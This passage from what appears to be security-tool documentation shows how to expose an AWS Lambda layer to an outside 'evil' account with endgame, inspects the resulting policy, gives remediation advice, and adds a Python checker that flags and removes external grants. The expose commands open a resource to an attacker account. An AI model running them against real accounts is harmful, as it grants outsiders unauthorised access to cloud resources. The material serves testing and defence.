- To expose the resource using `endgame`, run the following from the victim account:

```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda-layer --name test-resource-exposure:1
```
- To view the contents of the Lambda layer policy, run the following:

```bash
export VICTIM_RESOURCE_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure
export VERSION=3
aws lambda get-layer-version-policy \
    --layer-name $VICTIM_RESOURCE_ARN \
    --version-number $VERSION
```
- Observe that the output of the overly permissive Lambda Layer policy resembles the example shown below. The evil principal's account ID (999988887777) is granted `lambda:GetLayerVersion` access to the Lambda layer `arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1`.

```json
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
    "RevisionId": ""
}
```
TODO
- Trusted Accounts Only: Ensure that Lambda Layers are only shared with trusted accounts.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- AWS Access Analyzer: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See the AWS Access Analyzer documentation for more details.
- Restrict access to IAM permissions that could lead to exposure of your Lambda Layers: Tightly control access to the following IAM actions:
  - lambda:AddLayerVersionPermission: Grants permission to add permissions to the resource-based policy of a version of an AWS Lambda layer
  - lambda:GetLayerVersionPolicy: Grants permission to view the resource-based policy for a version of an AWS Lambda layer
  - lambda:ListFunctions: Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function
  - lambda:ListLayers: Grants permission to retrieve a list of AWS Lambda layers, with details about the latest version of each layer
  - lambda:ListLayerVersions: Grants permission to retrieve a list of versions of an AWS Lambda layer
  - lambda:RemoveLayerVersionPermission: Grants permission to remove a statement from the permissions policy for a version of an AWS Lambda layer

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here.
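The following is an added example, not part of the endgame project's code, that turns the "observe the policy" step and the "trusted accounts only" remediation above into a check: it parses the `get-layer-version-policy` output shown on this page, flags every `Allow` statement whose principal is `*` or belongs to an account outside an allow-list, and emits the matching `aws lambda remove-layer-version-permission` command (a real CLI subcommand) for each flagged statement ID. The sample responses are constructed from the policy on this page; `find_external_grants` and `remediation_commands` are names chosen here.

```python
import json
import re

# Constructed sample: the get-layer-version-policy response shown on this page.
SAMPLE_RESPONSE = r'''{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
    "RevisionId": ""
}'''

# Constructed sample: a layer version shared with everyone (Principal "*").
SAMPLE_PUBLIC_RESPONSE = json.dumps({
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "Public", "Effect": "Allow", "Principal": "*",
            "Action": "lambda:GetLayerVersion",
            "Resource": "arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1",
        }],
    }),
    "RevisionId": "",
})

ACCOUNT_ID_RE = re.compile(r"^arn:aws:iam::(\d{12}):")
LAYER_ARN_RE = re.compile(r"^arn:aws:lambda:[^:]+:\d{12}:layer:([^:]+):(\d+)$")


def principal_account(principal):
    """Return the 12-digit account ID behind an IAM principal ARN, or None if it has none."""
    m = ACCOUNT_ID_RE.match(principal)
    return m.group(1) if m else None


def _aws_principals(statement):
    """Normalise the Principal element to a flat list of strings ('*' stays '*')."""
    p = statement.get("Principal")
    if p == "*":
        return ["*"]
    if isinstance(p, dict):
        aws = p.get("AWS", [])
        return [aws] if isinstance(aws, str) else list(aws)
    return []


def find_external_grants(response_json, trusted_accounts):
    """Parse a get-layer-version-policy response and return Allow statements whose
    principal is public or outside trusted_accounts. Principals whose account cannot
    be determined are flagged as well, so the check errs on the side of reporting."""
    response = json.loads(response_json)
    policy = json.loads(response["Policy"])  # the Policy field is itself a JSON string
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        resources = stmt.get("Resource", [])
        resources = [resources] if isinstance(resources, str) else list(resources)
        for principal in _aws_principals(stmt):
            account = principal_account(principal)
            if principal == "*" or account not in trusted_accounts:
                findings.append({
                    "sid": stmt.get("Sid"),
                    "principal": principal,
                    "account": account,
                    "resources": resources,
                })
    return findings


def remediation_commands(findings):
    """Build the remove-layer-version-permission command for each flagged statement."""
    cmds = []
    for f in findings:
        if not f["sid"]:
            continue  # a statement without a Sid cannot be removed by ID
        for resource in f["resources"]:
            m = LAYER_ARN_RE.match(resource)
            if not m:
                continue
            name, version = m.groups()
            cmds.append(
                f"aws lambda remove-layer-version-permission --layer-name {name} "
                f"--version-number {version} --statement-id {f['sid']}"
            )
    return cmds


if __name__ == "__main__":
    trusted = {"111122223333"}  # the victim account from this page
    for label, response in (("page sample", SAMPLE_RESPONSE), ("public sample", SAMPLE_PUBLIC_RESPONSE)):
        findings = find_external_grants(response, trusted)
        print(f"{label}: {len(findings)} external grant(s)")
        for f in findings:
            print(f"  Sid={f['sid']} principal={f['principal']} account={f['account']}")
        for cmd in remediation_commands(findings):
            print(f"  {cmd}")
```

In practice the response string comes from the `aws lambda get-layer-version-policy` call shown above (or boto3's `get_layer_version_policy`) for each version listed by `lambda:ListLayerVersions`; the check complements AWS Access Analyzer rather than replacing it, since it only sees the layers you enumerate.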